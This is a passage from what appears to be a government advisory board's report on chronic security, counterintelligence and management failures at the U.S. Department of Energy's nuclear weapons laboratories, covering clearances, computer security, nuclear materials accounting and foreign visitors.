it will be one–tenth. It isn’t getting the attention it deserves.” Although the proportions cited by that critic would prove to be inaccurate, he accurately spotted the direction of the trend. _____________________________________ The DOE Management Challenge MISSION · Lead agency for development of national energy resources and technologies. · Responsible for the largest environmental cleanup effort in history. · Nuclear energy and weapons research and development. · Management of special nuclear materials stockpiles. · Protection of highly sensitive classified and proprietary information against foreign and corporate espionage. SIZE · If included among the Nation’s Fortune 500 firms, would rank in the top 50. · The fourth largest landowner in the United States. · Budget of roughly $18 billion comprises close to 3 percent of total discretionary spending at the federal level. · Employs more than 11,000 Federal employees and more than 100,000 contract employees. · Owns and manages more than 50 major installations spread across 2.4 million acres and 35 states. COMPLEXITY · A diverse workforce of military and civilian per-sonnel; U.S. citizens and foreign nationals; career federal officials and part-time researchers; white collar bureaucrats as well as scientists and engineers specializing in narrow esoteric fields. · Constituencies include the White House, Congress, the power industry, multinational defense and aerospace corporations, major universities, states and municipalities seeking or monitoring environmental cleanups. During 1978, its first year of operation within the new structure, DOE already had in place more than 9,500 prime contracts and more than 1,800 financial assistance awards, which together were spread among 188 universities and more than 3,200 contractors. And the Department was growing: from 1977 to 1978, grants and contracts with university researchers posted an increase of 22 percent.7 LACK OF ACCOUNTABILITY Depending on the issue at hand, a line worker in a DOE facility might be responsible to DOE headquarters in Washington, a manager in a field office in another state, a private contractor assigned to a DOE project, a research team leader from academia, or a lab director on another floor of the worker’s building. For example, prior to Secretary Richardson’s restructuring initiative earlier this year, a single laboratory, Sandia, was managed or accountable to nine different DOE security organizations. Last year, after years of reports highlighting the problem of confused lines of authority, DOE was still unable to ensure the effectiveness of security measures because of its inability to hold personnel accountable. A 1998 report lamented that “short of wholesale contract termination, there did not appear to be adequate penalty/reward systems to ensure effective day–to–day security oversight at the contractor level.”8 The problem is not only the diffuse nature of authority and accountability in the Department. It is the dynamic and often informal character of the authority that does exist. The inherently unpredictable outcomes of major experiments, the fluid missions of research teams, the mobility of individual researchers, the internal competition among laboratories, the ebb and flow of the academic community, the setting and onset of project deadlines, the cyclical nature of the federal budgeting process, and the shifting imperatives of energy and security policies dictated from the White House and Congress—all of these dynamic variables contribute to volatility in the Department’s workforce and an inability to give the weapons–related functions the priority they deserved. Newcomers, as a result, have an exceedingly hard time when they are assimilated; incumbents have a hard time in trying to administer consistent policies; and outsiders have a hard time divining departmental performance and which leaders and factions are credible. Such problems are not new to government organizations, but DOE’s accountability vacuum has only exacerbated them. Management and security problems have recurred so frequently that they have resulted in nonstop reform initiatives, external reviews, and changes in policy direction. As one observer noted in Science magazine in 1994: “Every administration sets up a panel to review the national labs. The problem is that nothing is done.” The constant managerial turnover over the years has generated nearly continuous structural reorganizations and repeated security policy reversals. Over the last dozen years, DOE has averaged some kind of major departmental shake–up every two to three years. During that time, security and counterintelligence responsibilities have been “punted” from one office to the next. CULTURE AND ATTITUDES In the course of this inquiry, many officials interviewed by the PFIAB panel cited the scientific culture of the weapons laboratories as a factor that complicates, perhaps even undermines, the ability of the Department to consistently implement its security procedures. Although there seemed to be no universally accepted definition of the culture, nearly everyone agreed that it is distinct and pervasive. One facet of the culture mentioned more than others is an arrogance borne of the simple fact that nuclear researchers specialize in one of the world’s most advanced, challenging, and esoteric fields of knowledge. Nuclear physicists, by definition, are required to think in literally other dimensions not accessible to laymen. Thus it is not surprising that they might bridle under the restraints and regulations of administrators and bureaucrats who do not entirely comprehend the precise nature of the operation being managed. Operating within a large, complex bureaucracy with transient leaders would only tend to accentuate a scientist’s sense of intellectual superiority: if administrators have little more than a vague sense of the contours of a research project, they are likely to have little basis to know which rules and regulations constitute unreasonable burdens on the researchers’ activities. With respect to at least some security issues, the potential for conflicts over priorities is obvious. For example, how are security officials to weigh the risks of unauthorized disclosures during international exchanges if they have only a general familiarity with the cryptic jargon used by the scientists who might participate? The prevailing culture of the weapons labs is widely perceived as contributing to security and counterintelligence problems. At the very least, restoring public confidence in the ability of the labs to protect nuclear secrets will require a thorough reappraisal of the culture within them. CHANGING TIMES, CHANGING MISSIONS The external pressures placed on the Department of Energy in general, and the weapons labs in particular, are also worth noting. For more than 50 years, America’s nuclear researchers have operated in a maelstrom of shifting and often contradictory attitudes. In the immediate aftermath of World War II, nuclear discoveries were simultaneously hailed as a destructive scourge and a panacea for a wide array of mankind’s problems. The production of nuclear arms was regarded during the 1950s and 1960s as one of the best indices of international power and the strength of the nation’s military deterrent. During the 1970s, the nation’s leadership turned to nuclear researchers for solutions to the energy crisis at the same time that the general public was becoming more alarmed about the nuclear buildup and the environmental implications of nuclear facilities. Over the past 20 years, some in Congress have repeatedly called for the dissolution of the Department of Energy, which has undoubtedly been a distraction to those trying to make long–term decisions affecting the scope and direction of the research at the labs. And in the aftermath of the Cold War, the Congress has looked to the nation’s nuclear weapons labs to help in stabilizing or dismantling nuclear stockpiles in other nations. Each time that the nation’s leadership has made a major change in the Department’s priorities or added another mission, it has placed additional pressure on a government agency already struggling to preserve and expand one of its most challenging historical roles: guarantor of the safety, security, and reliability of the nation’s nuclear weapons. RECURRING VULNERABILITIES Over the past 20 years, six DOE security issues have received the most scrutiny and criticism from both internal and external reviewers: long–term security planning and policy implementation; physical security over facilities and property; screening and monitoring of personnel; protection of classified and sensitive information, particularly information that is stored electronically in the Department’s computers; accounting for nuclear materials; and the foreign visitors’ programs. MANAGEMENT AND PLANNING Management of security and counterintelligence has suffered from chronic problems since the creation of the Department of Energy in 1977. During the past decade, the mismatch between DOE’s security programs and the severity of the threats faced by the Department grew more pronounced. While the number of nations possessing, developing, or seeking weapons of mass destruction continued to rise, America’s reliance on foreign scientists and engineers dramatically increased, and warnings mounted about the espionage goals of other nations, DOE spending on safe-guards and security decreased by roughly one–third.1 The widening gap between the level of security and the severity of the threat resulted in cases where sensitive nuclear weapons information was certainly lost to espionage. In countless other instances, such information was left vulnerable to theft or duplication for long periods, and the extent to which these serious lapses may have damaged American security is incalculable. DOE’s failure to respond to warnings from its own analysts, much less independent sources, underscores the depth of its managerial weakness and inability to implement legitimate policies regarding well–founded threats. _________________________________________ A Sample of Security Issues MANAGEMENT AND PLANNING Decentralized decisionmaking undermines consistency of policies. Lack of control for security budget has allowed diversion of funds to other priorities. Department leaders with little experience in security and intelligence. Lack of accountability. PHYSICAL SECURITY Training insufficient for some security personnel. Nuclear materials stored in aging buildings not designed for containment purposes. Recurring problems involving lost or stolen property. Poor management results in unnecessary training and purchasing costs. PERSONNEL SECURITY CLEARANCES Extended lags in obtaining clearances, reinvestigating backgrounds, and terminating clearance privileges for former employees. Some contractors not adequately investigated or subject to drug & substance abuse policies. Lack of uniform procedures and accurate data. Inadequate pre–employment screening. More clearances granted than necessary. PROTECTION OF CLASSIFIED INFORMATION Poor labeling and tracking of computer media containing classified information. Problems with lax enforcement of password policies. Network, email, and Internet connections make transfer of large amounts of data easier. ACCOUNTING FOR NUCLEAR MATERIALS Chronic problems in devising and operating an accurate accounting system of tracking stocks and flows of nuclear materials. FOREIGN VISITORS Weak systems for tracking visits and screening backgrounds of visiting scientists. Decentralization makes monitoring of discussions on sensitive topics difficult. During the mid–1980s, the predominant concern of DOE officials was improving the physical security of the nuclear weapons laboratories and plants. Following a January 1983 report2 that outlined vulnerabilities of the weapons labs to terrorism, the Department embarked on a five–year program of construction and purchases that would see its overall safeguards and security budget roughly double and its spending on upgrades nearly triple. Included was money for additional guards, security training, helicopters, fortified guard towers, vehicle barriers, emergency planning, and advanced alarm systems.3 Improving physical security in a wide array of nuclear weapons facilities whose replacement value was an estimated $100 billion4 , proved to be difficult. Reports through the late 1980s and early 1990s continued to highlight deficiencies in the management of physical security. In the late 1980s, priorities began to shift somewhat. Listening devices were discovered in weapons–related facilities,5 and a 1990 study advised the Department leadership of an intensifying threat from foreign espionage. Less and less able to rely on the former Soviet Union to supply technology and resources, an increasing number of states embarked on campaigns to bridge the economic and technological gap with the United States by developing indigenous capabilities in high technology areas. The study noted that the freer movement of goods, services and information in a less hostile world “intensified the prospects and opportunities for espionage as missing pieces of critically needed information became more easily identified.”6 An intelligence report further highlighted the changing foreign threat to the labs by noting that “new threats are emerging from nontraditional adversaries who target issues key to U.S. national security. DOE facilities and personnel remain priority targets for hostile intelligence collection.”7 Anecdotal evidence corroborates, and intelligence assessments agree, that foreign powers stepped up targeting of DOE during the early 1990s. (See Classified Appendix) While this threat may have been taken seriously at the highest levels of the DOE, it was not uniform throughout the Department. A former FBI senior official noted in discussions with the PFIAB investigative panel that DOE lab scientists during these years appeared naive about the level of sophistication of the nontraditional threat posed by Chinese intelligence collection. The trend in openness to foreign visitors and visits does not indicate any sense of heightened wariness. A 1997 GAO report concluded that from mid–1988 to the mid–1990s, the number of foreign visitors to key weapons labs increased from 3,800 to 5,900 annually and sensitive country visitors increased from 500 to more than 1,600.8 Meanwhile, the DOE budget for counterintelligence was in near–constant decline. How Long Does It Take? Each year DOE security officials compile audits to identify security lapses and vulnerabilities in the facilities and procedures of the nuclear weapons laboratories and plants. The following year, they report on whether the problems have been addressed. Given the sensitivity of what was being protected—information about how to build, miniaturize, store, and maximize the destructiveness of nuclear weapons—the numbers logged in the audits are remarkable: 11 No. of months a DOE employee was dead before Department officials realized four documents with CLASSIFIED and RESTRICTED DATA were still assigned to him. 20 No. of months before DOE officials could ensure that improperly stored classified computer media had been properly safeguarded. 24 No. of months it took to order security labels (SECRET, TOP SECRET, etc.) for mislabeled software. 31 No. of months that 2,750 out of 3,000 non-classified computer terminals were connected and being used on a classified network. 31 No. of months to write and approve a network security plan. 35 No. of months it took DOE officials to write a work order to replace a lock at a weapons lab facility containing sensitive nuclear information. 45 No. of months taken to correct a broken doorknob that was sticking in an open position and allowing access to sensitive areas. 51 No. of months to correct mistake that allowed secure telephone cryptographic materials to go improperly safeguarded. ? No. of months before security audit team discovered that the main telephone frame room door at a weapons lab had been forced open and the lock destroyed. SOURCE: DEPT. OF ENERGY As noted in the previous chapter, federal officials in charge of oversight of nuclear weapons laboratories have historically allowed decisionmaking on basic aspects of security to be decentralized and diffuse. With their budget spread piecemeal throughout a number of offices, security and counterintelligence officials often found themselves with a weak voice in internal bureaucratic battles and an inability to muster the authority to accomplish its goals. Indeed, an excerpt from a history of the early years of the Atomic Energy Commission, reads much like recent studies: Admiral Gingrich, who had just resigned as director of security [in 1949], had expressed to the Joint Committee [on Atomic Energy] a lack of confidence in the Commission’s security program. Gingrich complained that decentralization of administrative functions to the field offices had left him with little more than a staff function at headquarters; even there, he said, he did not control all the activities that seemed properly to belong to the director of security.9 More than 30 years later, decentralization still posed a problem for security managers. An internal DOE report in 1990 found that the Department lacked a comprehensive approach to management of threats and dissemination of information about them.10 A DOE annual report in 1992 found that security “has suffered from a lack of management focus and inconsistent procedural execution throughout the DOE complex. The result is that personnel are seldom held responsible for their disregard, either intentional or unintentional, of security requirements.”11 The counterintelligence effort at DOE in the late 1980s and mid–1990s was in its infancy and grossly underfunded. Although the Department could have filled its gap in some areas, such as counterintelligence information, through cooperation with the broader intelligence community, PFIAB research and interviews indicate that DOE headquarters’ relationship with the FBI—the United States’ primary domestic CI organization—was strained at best. DOE requested an FBI agent detailee in 1988 to assist in developing a CI program, but the agent found that DOE failed to provide management support or access to senior DOE decisionmakers. A formal relationship with the FBI was apparently not established until 1992: a Memorandum of Understanding between the FBI and DOE on respective responsibilities concerning the coordination and conduct of CI activities in the United States. However, in 1994 two FBI detailees assigned to DOE complained about their limited access and were pulled back to FBI because of a “lack of control of the CI program by DOE headquarters which resulted in futile attempts to better manage the issue of foreign visitors at the laboratories.”12 ________________________________ We asked a number of DOE officials to whom they report, to whom they were responsible. Invariably, their answer was: “It depends.” The haphazard assortment of agencies and missions folded into DOE has become so confusing as to become a running joke within the institution. In the course of the panel’s research and interviews, rare were the senior officials who expressed any sort of confidence in their understanding of the extent of the agency’s operations, facilities, or procedures. Time and again, PFIAB panel members posed the elementary questions to senior DOE officials. To whom do you report? To whom are you accountable? The answer, invariably, was: “It depends.” DOE’s relationship with the broader intelligence community was not well–defined until the mid–1990s. Coordination between DOE CI elements and the broader intelligence community, according to a 1992 intelligence report, was hampered from the 1980s through the early 1990s by DOE managers’ inadequate understanding of the intelligence community.13 The Department did not become a core member of the National Counterintelligence Policy Board (established in 1994 under PDD-24) until 1997. Over much of the past decade, rather than a heightened sensitivity to espionage threats recognized widely throughout the intelligence community, DOE lab officials have operated in an environment that allowed them to be sanguine, if not skeptical. Numerous DOE officials interviewed by the PFIAB panel stated that they believed that the threat perception was weakened further during the administration of Secretary O’Leary, who advanced the labs openness policies and downgraded security as an issue by terminating some security programs instituted by her predecessor. Even when the CI budget was expanded in the late–1990s, the expenditures fell short of the projected increases. In Fiscal Year 1997, for example, DOE’s CI budget was $3.7 million but the actual expenditures on CI were only two–thirds of that level, $2.3 million. Shortly before the 1997 GAO and FBI reports on DOE’s counterintelligence posture were issued, DOE began instituting changes to beef up its counterintelligence and foreign intelligence analytic capabilities.14 When DOE did devote its considerable resources to security, it too often faltered in implementation. A report to the Secretary in January 1994 noted “growing confusion within the Department with respect to Headquarters’ guidance for safeguards and security. At this time, there is no single office at Headquarters responsible for the safeguards and security program. Most recently, a number of program offices have substantially expanded their safeguards and security staff to office–size organizations. These multiple safeguards and security offices have resulted in duplication of guidance, unnecessary requests for information and clarification, and inefficient program execution. Unchecked, this counterproductive tendency threatens the success of the overall safeguards and security effort.”15 A 1996 DOE Inspector General report found that security personnel at the weapons programs had purchased and stockpiled far more firepower—ranging from handguns and rifles to submachine guns and grenade launchers—than could ever be used in an actual emergency. The Oak Ridge facilities had more than three weapons per armed security officer—on and off duty. Los Alamos National Laboratory had more than four.16 ____________________________________ Foreign agents could probably not shoot their way into U.S. weapons laboratories. But they could apply for an access pass to walk in and strike up a conversation. Around the same time, GAO security audits of the research laboratories at these sites found lax procedures for issuing access passes to secure areas, inadequate prescreening of the more than 1,500 visitors from sensitive countries that visited the weapons laboratories annually, and poor tracking of the content of discussions with foreign visitors. The implication: foreign agents could probably not shoot their way past the concertina wires and bolted doors to seize secrets from U.S. weapons laboratories, but they would not need to do so. They could probably apply for an access pass, walk in the front door, and strike up a conversation. PHYSICAL SECURITY The physical security of the Department of Energy’s weapons–related programs is roughly divided into two essential functions: tracking and control over the property and equipment within the weapons-related laboratories, and keeping unwarranted intruders out, often referred to as the realm of “guns, guards, and gates.” The general approach to security, of course, was defined by the emphasis on secrecy associated with nuclear weapons program during World War II. Los Alamos National Laboratory was created as a “closed city”—a community with a high degree of self-sufficiency, clearly defined and protected boundaries, and a minimum of ingress from and egress to the outer world. Although the community is no longer “closed,” the weapons laboratories at Los Alamos, like those at the other national laboratories, still retain formidable physical protections and barriers. In examining the history of the laboratories, the panel found only a few instances where an outsider could successfully penetrate the grounds of an operation by destruction of a physical safeguard or direct violent assault. __________________________________ Clearances to secure DOE areas have been granted simply for convenience, such as to reduce the length of an employee’s walk from the car to the office each morning. In visits to several of the weapons laboratories, the members of the Special Investigative Panel were impressed by the great amount of attention and investment devoted to perimeter control, weaponry, and security of building entrances and exits. Indeed, one cannot help but be struck by the forbidding and formidable garrison–type atmosphere that is prevalent at many of the facilities: barbed wire, chain–link fences, electronic sensors, and surveillance cameras. Further, the panel recognizes that the labs themselves have developed and produced some of the most sophisticated technical security devices in the world. Nonetheless, DOE reports and external reviews since at least 1984 have continued to raise concerns about aging security systems.17 Management of the secure environments at the laboratories has posed more serious problems. As noted earlier, DOE may be spending too much money in some areas, buying more weapons than could conceivably be used in an emergency situation. In other cases, it may be spending too little. Budget cuts in the early and mid-1990s led to 40 to 50 percent declines in officer strength and over-reliance on local law enforcement. Resources became so low that normal protective force operations required “the use of overtime scheduling to accomplish routine site protection.”18 GAO has found an assortment of problems at Los Alamos over the past decade: security personnel failed basic tests in such tasks as firing weapons, using a baton, or handcuffing a suspect, and inaccurate and incomplete records were kept on security training.19 Other DOE facilities have had substantial problems in man-agement of physical property. In 1990, Lawrence Livermore Laboratory could not account for 16 percent of its inventory of government equipment, acquired at a cost $18.6 million.20 In 1993, DOE sold 57 components of nuclear reprocessing equipment and associated documents, including blueprints, to an Idaho salvage dealer. Much of what was sold was subsequently found to be potentially useful to any nation attempting to develop or advance its own reprocessing operation.21 Following a GAO report in 1994, which found that the Rocky Flats facility was unable to account for large pieces of equipment such as forklifts and a semitrailer, some $21 million in inventory was written off.22 DOE had begun to consolidate its growing stockpile of sensitive nuclear material by 1992, but a 1997 DOE report to the Secretary found that significant quantities of the material “remain in aging buildings and structures, ranging in age from 12 to 50 years, that were never intended for use as storage facilities for extended periods.”23 SCREENING AND MONITORING OF PERSONNEL Insider threats to security have been a chronic problem at the nation’s weapons laboratories. From the earliest years, the importance of the labs’ missions and their decentralized structure have had an uneasy coexistence with the need for thorough background investigations of researchers and personnel needing access to sensitive areas and information. In 1947, the incoming director of security for the AEC was greeted with a backlog of more than 13,000 background investigations and a process where clearances had been dispersed to field offices that operated with few formal guidelines.24 Forty years later, GAO found that the backlog of personnel security investigations had increased more than nine-fold, to more than 120,000. Moreover, many clearances recorded as valid in the Department’s records should have been terminated years before.25 ____________________________________ Even after DOE discovered listening devices in some of its weapons laboratories, security audits found that thousands of “Q” clearances were being given to inappropriate personnel.26 The research of the PFIAB panel found that problems with personnel security clearances, while mitigated in some aspects, have persisted to an alarming degree. From the mid–1980s through the mid–1990s, the DOE Inspector General repeatedly warned Department officials that personnel were receiving clearances that were much higher than warranted and that out-dated clearances were not being withdrawn on a timely basis. The issue became more urgent with the discovery of a clandestine surveillance device at a nuclear facility.27 But problems persisted. DOE Inspector General reports in 1990 and 1991 found that one of the weapons laboratories had granted “Q” clearances (which provide access to U.S. government nuclear weapons data) to more than 2,000 employees who did not need access to classified information.28 A 1992 report to the Secretary of Energy noted that “DOE grants clearances requested by its three major defense program sponsored labs based on lab policies to clear all employees regardless of whether actual access to classified interests is required for job performance.”29 Three years later, a review of personnel security informed the Secretary there were “individuals who held security clearances for convenience only and limited security clearances to those individuals requiring direct access to classified matter or [special nuclear materials] to perform official duties.”30 More recent evidence is no more reassuring. A counterintelligence investigation at a nuclear facility discovered that the subject of an inquiry had been granted a “Q” clearance simply to avoid the delay caused by the normal processing of a visit.31 That same year, an illegal telephone wiretap was discovered at the same lab. The employee who installed it confessed, but was not prosecuted by the government.32 PROTECTION OF CLASSIFIED AND SENSITIVE INFORMATION Two vulnerabilities regarding classified and sensitive information at DOE have recurred repeatedly throughout the past 20 years: inappropriate release of classified information, either directly through inadvertence or indirectly through improper declassification; and the increasing mobility of classified and sensitive information through electronic media, such as computers. As computers have progressed from the large mainframes of the 1950s and 1960s to desktop models in the 1980s and decentralized networks in the 1990s, it has become progressively easier for individuals to retrieve and transport large amounts of data from one location to another. This has presented an obvious problem for secure environments. GAO found in 1991 that DOE inspections revealed more than 220 security weaknesses in computer systems across 16 facilities. Examples included a lack of management plans, inadequate access controls, and failures to test for compliance with security procedures.33 As a 1996 DOE report to the President said, “adversaries no longer have to scale a fence, defeat sensors, or bypass armed guards to steal nuclear or leading–edge ‘know-how’ or to shut down our critical infrastructure. They merely have to defeat the less ominous obstacles of cyber–defense.”34 _____________________________________ Computer systems at some DOE facilities were so easy to access that even Department analysts likened them to “automatic teller machines, [allowing] unauthorized withdrawals at our nation’s expense.” DOE’s cyber–defenses were, in fact, found to be “less ominous obstacles.” In 1994, an internal DOE review found that despite security improvement “users of unclassified computers continue to compromise classified information due to ongoing inadequacies in user awareness training, adherence to procedures, enforcement of security policies, and DOE and [lab] line management oversight.”35 Also in 1994, a report to the Energy Secretary cited five areas of concern: “failure to properly accredit systems processing classified information, lack of controls to provide access authorities and proper password management; no configuration management; improper labeling of magnetic media; and failure to perform management reviews.”36 Apparently, the warnings were to no avail. A year later, the annual report to the Secretary noted: “Overall, findings and surveys, much like last year, continue to reflect deficiencies in self–inspections and procedural requirements or inappropriate or inadequate site guidance … In the area of classified matter protection and control, like last year, marking, accountability, protection, and storage deficiencies are most numerous.”37 Some reports made extra efforts to puncture through the fog of bureaucratic language. A 1995 report to the President said: “By placing sensitive information on information systems, we increase the likelihood that inimicable interests, external and internal, will treat those systems as virtual automatic teller machines, making unauthorized withdrawals at our nation’s expenses.” Indeed, a report found security breaches at one of the major weapons facility in which documents with unclassified but sensitive information “were found to be stored on systems that were readily accessible to anyone with Internet access.”38 In other instances, personnel were found to be sending classified information to outsiders via an unclassified email system.39 Ahead of its Time In 1986, the DOE Office of Safeguards and Quality Assessment issued an inspection report on a weapons lab that warned of shortcomings in computer security and noted that the “ability of [a] user to deliberately declassify a classified file without detection and move classified information from the secure partition to the open partition can be made available to any authorized user either on or off site.”40 The warning turned out to be on the mark. In April of this year, Energy Secretary Bill Richardson issued a statement: “While I cannot comment on the specifics, I can confirm that classified nuclear weapons computer codes at Los Alamos were transferred to an unclassified computer system. This kind of egregious security breach is absolutely unacceptable ... .” Even though the hard evidence points to only sporadic penetrations of the labs by foreign intelligence services (see classified appendix), volumes of sensitive and classified information may have been lost over the years—via discarded or purloined documents; uninformed and often improperly vetted employees, and a maze of uncontrolled computer links. In one recent case discovered by PFIAB, lab officials initially refused to rectify a security vulnerability because “no probability is assigned to [a loss of sensitive information], just the allegation that it is possible.”41 As recent as last year’s annual DOE report to the President, security analysts were finding “numerous incidents of classified information being placed on unclassified systems, including several since the development of a corrective action plan in July 1998.”42 TRACKING OF NUCLEAR MATERIALS: HOW MUCH MUF? MUF stands for “materials unaccounted for,” the official term used until the late 1970s for discrepancies in the amount of nuclear materials that can be physically located in inventory versus the amount noted in Department records. MUF (now termed with the more politic phrase “inventory differences”) has been a recurring concern—and debate—in the nuclear research field since the beginning. The question at the center of the debate: if large quantities of nuclear material are impossible to measure with absolute precision, what constitutes a significant loss? As in many questions, the answer depends on whom you ask. Officials of nuclear research facilities have argued that the scale and complexity of the processing and handling of nuclear material inevitably result in losses that are detectable but inconsequential. Outside observers have tended to be less sanguine about what constitutes a significant loss from a security standpoint. In 1976, the General Accounting Office reported that the Nuclear Regulatory Commission and the Energy Research and Development Administration (DOE’s predecessor) could not account for 8,000 pounds of highly enriched uranium and plutonium. Officials of the two agencies responded that part of the accounting discrepancy could be ascribed to the statistical margin of error in their measuring equipment, the rest was probably dregs created during processing and left in machinery parts, wiping cloths, and scrap items.43 Critics of the agencies have pointed out that thieves could easily use the variance in statistical measures to cover their tracks, stealing an increment during each measuring period that falls just within the margin of error. They have also pointed out that if Department records are not accurate, it is impossible for anyone to estimate the stock of nuclear material at any given point, much less the difference between two levels as it proceeds from one stage of the nuclear cycle to the next. In December 1994, the Department released updated figures for the cumulative amount of MUF or inventory difference for the 50-year period beginning in 1944. The cumulative figure: 6,174 pounds. Of that amount, a cumulative total of about 10 pounds was ascribed to “accidental losses” and “approved write-offs.”44 GAO has continued to highlight the issue since DOE has become the steward of the nation’s nuclear weapons laboratories. GAO published a report in 1991 criticizing the insufficiency of the Department’s measuring systems and handling procedures45 ; in 1994, criticizing its methods of tracking exported nuclear material;46 and in 1995, for installing a new system that was allegedly faulty.47 Even if accurate systems of measurement and accounting had been in place, it is not clear whether DOE officials would have been qualified to manage them effectively. A 1995 report to the President warned that “severe budget reductions, diminished technical resources, increased responsibilities, and reduced mission training ... have undermined protection of special nuclear material and restricted data.”48 Last year, a report by an external review panel found “a lack of nuclear physical security expertise at all levels in the oversight process; ad hoc structuring of safeguards and security functions throughout the Department, and placement of oversight functions in positions which constrain their effectiveness.”49 The dispute over the accuracy of nuclear measurements, of course, is beyond the technical capabilities of this panel to resolve. But the panel members do believe that its persistence and the low priority given to the issue relative to other DOE scientific goals is indicative of the insti-tutional attitude that DOE has had toward security: nonscientists have a poor understanding of all things nuclear, so their judgments about acceptable levels of risk are suspect prima facie. FOREIGN VISITORS AND ASSIGNMENTS PROGRAM True to the tradition of international partnership molded by the experiences of the Manhattan Project, the weapons labs have remained a reservoir of the best international scientific talent. Recent examples abound: a supercomputing team from Oak Ridge National Lab, made up of three PRC citizens and a Hungarian, recently won the Gordon Bell Prize; a Bulgarian and a Canadian, both world-class scientists, are helping Lawrence Livermore National Lab solve problems in fluid dynamics; a Spanish scientist, also at Livermore, is collaborating with colleagues on laser propagation. But for more than a decade, the increasing prominence of foreign visitors in the weapons labs has increased concern about security risks. The PFIAB panel found that as early as 1985, the DCI raised concerns about the foreign visitors’ program with the Energy Secretary. A year later, researchers conducting internal DOE review could find only scant data on the number and composition of foreign nationals at the weapons labs. Although intelligence officials drafted suggestions for DOE’s foreign visitor control program, PFIAB found little evidence of reform efforts until the tenure of Secretary Watkins. A 1988 GAO report cited DOE for failing “to obtain timely and adequate information on foreign visitors before allowing them access to the laboratories.” The GAO found three cases where DOE allowed visitors with questionable backgrounds—possible foreign agents—access to the labs. In addition, the GAO found that about 10 percent of 637 visitors from sensitive countries were associated with foreign organizations suspected of conducting nuclear weapons activities but DOE did not request background data on them prior to their visit. DOE also had not conducted its own review of the visit and assignment program at the weapons labs despite the DOE requirement to conduct audits or reviews at a minimum of every five years. Moreover, GAO reported that few post–visit or host reports required by DOE Order 12402 were submitted within 30 days of the visitors’ departure and some were never completed.50 The following year, DOE revised its foreign visitor policy and commissioned an external study on the extent and significance of the foreign visitor problem. DOE’s effort to track and vet visitors, however, still lagged well behind the expansion of the visitor program, allowing foreigners with suspicious backgrounds to gain access to weapons facilities. A study published in June 1990 indicated DOE had a “crippling lack of essential data, most notably no centralized, retrievable listing of foreign national visitors to government facilities.”51 By September, 1992, DOE had instituted Visitor Assignment Management System (VAMS) databases, used to track visitors and assignees requesting to visit DOE. The system, however, failed to provide links between the labs that could be used for CI analysis and cross-checking of prospective visitors. Moreover, labs frequently did not even use the database and failed to enter visitor information. Instead, each lab developed its own computer program independently. Reviews of security determined that, despite an increase of more than 50 percent in foreign visits to the labs from the mid–1980s to the mid–1990s, DOE controls on foreign visitors actually weakened in two critical areas: screening for visitors that may pose security risks, and monitoring the content of discussions that might touch on classified information. In 1994, DOE headquarters delegated greater authority to approve nonsensitive country visitors to the laboratories, approving a partial exception for Los Alamos and Sandia National Laboratories to forego background checks to help “reduce costs and processing backlogs.” This resulted in almost automatic approval of some foreign visitors and fewer background checks. The FBI and GAO subsequently found that “questionable visitors, including suspected foreign intelligence agents, had access to the laboratories without DOE and/or laboratory officials’ advance knowledge of the visitors’ backgrounds.”52 Changes in records checks over the past decade also made it easier for individuals from sensitive countries to gain access to the laboratories. In 1988, for example, all visitors from Communist countries required records checks regardless of the purpose of the visit. By 1996, records checks were only required for visitors from sensitive countries who visited secure areas or discussed sensitive subjects. An internal DOE task force in 1996 determined that the Department’s definitions of sensitive topics were not specific enough to be useful. It directed the DOE office of intelligence to develop a new methodology for defining sensitive topics, but did not set a due date. The 1996 group also called for a Deputy Secretary–level review of foreign visits and assignments to be completed by June 1997.53 The PFIAB panel found no evidence to suggest that these tasks were accomplished. In 1997, GAO found that DOE lacked clear criteria for identifying visits that involve sensitive subjects, U.S. scientists may have discussed sensitive subjects with foreign nationals without DOE’s knowledge or approval; and the Department’s counterintelligence program had failed to produce comprehensive threat assessments that would identify likely facilities, technologies, and programs targeted by foreign intelligence.54 The study found that records checks were still not being conducted regularly on foreign visitors from sensitive countries.55 Last year, 7,600 foreign scientists paid visits to the weapons labs.56 Of that total, about 34 percent were from countries that are designated “sensitive” by the Department of Energy—meaning they represent a hostile intelligence threat. The GAO reported last year that foreign nationals had been allowed after-hours and unescorted access to buildings.57 Administration Track Records CARTER (Schlesinger: Aug '77-Aug '79; Duncan: Aug '79-Jan '81) '77 DOE established … First visiting U.S. scientists to China in '79 and '80 face Chinese elicitation effort. …Late 1970s FBI investigates possible espionage at a lab. …'80 GAO reports on problems safeguarding against the spread of nuclear weapons technology. REAGAN I (Edwards: Jan '81-Nov '82; Hodel: Nov '82-Feb '85; Herrington: Feb '85- ) '82 DOE's Inspection and Evaluation program formed …GAO reports safeguards and security of weapons labs not adequate, recommends independent assessments program. …'83 DOE issues threat guidance to provide a “consistent basis" for identifying vulnerabilities. …Memo to DOE, DOD states President has "decided to strengthen WH role … concerning the security of U.S. nuclear facilities."… President signs National Security Decision Directive (NSDD) on DOE security. … DOE Safeguards and Security Steering Group formed at President's direction to oversee fulfillment of physical security improvements … GAO reports security concerns at Rocky Flats facility. … DOE conducts eight internal security inspections at weapons facilities and DOE HQ; provides criticisms and recommendations to DOE management. … '84 DOE's Central Training Academy established for protective force personnel. REAGAN II (Herrington: Feb '85-Jan '89) '86 Rep. Dingell letter to President re: lab security vulnerabilities, management problems and lack of confidence in DOE. … Four GAO reports on DOE security and CI problems … External report requested by DOE finds problems with management of foreign visitors and adequate security. …'87 Three GAO reports on DOE highlight the transfer of technology to proliferating nations and inefficient security clearance program. …Seven internal DOE security inspections criticize management and security practices in '87-'88. …DOE initiates the Personnel Security Assurance Program (PSAP) … DOE focuses on insider protection and strengthens classified document controls. …Three DOE IG reports about security clearance problems from '86-'88. …'88 Intelligence Community paper reflects concerns with international scientific exchanges at the DOE labs. … President signs NSDD on Nuclear Weapons Safety, Security, and Control. … FBI detailee to DOE cites inaccessibility to senior DOE managers. …President states "Improved nuclear security is an important legacy for us to leave the next administration;" DOE official opines that Energy has done "essentially all that can be done against the outsider threat." … Senate Intelligence Committee staff briefed on CI activities at labs. … Four GAO reports address DOE security and counter-intelligence problems, including: major weaknesses in foreign visitor controls at labs, and foreign agents possibly gaining access to labs. BUSH (Watkins: Mar '89-Jan '93) '89 New Secretary concerned about 1988 GAO criticism of DOE CI/security, defers DOE annual report on security until he reviews issue; NSC concurs. … GAO finds insufficient control over weapons-related information and technology. …'90 Four IG reports on security … Secretary of Energy Advisory Board (SEAB) chartered … Interagency CI group prepares assessment of intelligence threat to government facilities from visiting foreign nationals. …GAO cites lack of clear, concise physical security standards and inconsistent material measurements at labs. … Freeze Task Force critical of split management of classified and unclassified computer 